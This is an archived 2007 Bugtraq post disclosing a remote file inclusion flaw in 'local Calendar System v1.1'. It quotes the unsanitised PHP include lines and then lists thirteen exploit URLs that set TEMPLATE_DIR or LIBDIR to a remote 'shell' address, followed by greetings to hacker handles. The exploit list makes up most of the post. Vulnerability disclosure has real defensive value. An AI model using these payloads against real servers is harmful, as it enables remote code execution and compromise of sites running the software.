bugtraq
[Top] [All Lists]

local Calendar System v1.1 (lcStdLib.inc) Remote File Include

To: bugtraq@securityfocus.com
Subject: local Calendar System v1.1 (lcStdLib.inc) Remote File Include
From: trzindan@hotmail.fr
Date: 27 Jan 2007 17:46:55 -0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm
+-------------------------------------------------------------------------------------------
local Calendar System v1.1 (lcStdLib.inc) Remote File Include

Tr_ZiNDaN

trzindan@hotmail.fr Turkey
--------------------------------------------------------------------------------------------
download : ftp://ftp.loci.wisc.edu/locisoftware/LoCal/LoCal-1.1.tar.gz
--------------------------------------------------------------------------------------------

code :
require "$TEMPLATE_DIR/header.inc";
require("$LIBDIR/lcStdLib.inc");
require("$LIBDIR/lcUser.php");
require ("$LIBDIR/lcGroup.inc");
require("$LIBDIR/lcCal.inc");
require("$LIBDIR/Calendar.inc");
require("$LIBDIR/lcErrorChecker.inc");
include ("$TEMPLATE_DIR/navbar.php");
include("$TEMPLATE_DIR/footer.inc");
--------------------------------------------------------------------------------------------
exploit:

local/showinvoices.php?TEMPLATE_DIR=shell?
local/editevent.php?LIBDIR=shell?
local/resetpassword.php?LIBDIR=shell?
local/signup.php?LIBDIR=shell?
local/showmonth.php?TEMPLATE_DIR=shell?
local/showmonth.php?LIBDIR=shell?
local/showday.php?LIBDIR=shell?
local/showevents.php?LIBDIR=shell?
local/showevents.php?TEMPLATE_DIR=shell?
local/retrieveinvoice.php?TEMPLATE_DIR=shell?
local/modifyitem.php?TEMPLATE_DIR=shell?
local/lookup_userid.php?LIBDIR=shell?
local/lookup_userid.php?TEMPLATE_DIR=shell?

--------------------------------------------------------------------------
Thanx

str0ke,EL_MuHaMMeD,Crackers_Child,H0tturk,EntriKa,XYU,E-system,RedWorm
Blackwolf,Mefisto,M3rhametsiz,Paradox_,Sehzade,Volqan,Arslan,KurtEfendy.. 


-------------------------------------------------------------------------

##---ALL MusLim 
Hackers------------------------------------------------------------------------------------------------


<Prev in Thread] Current Thread [Next in Thread>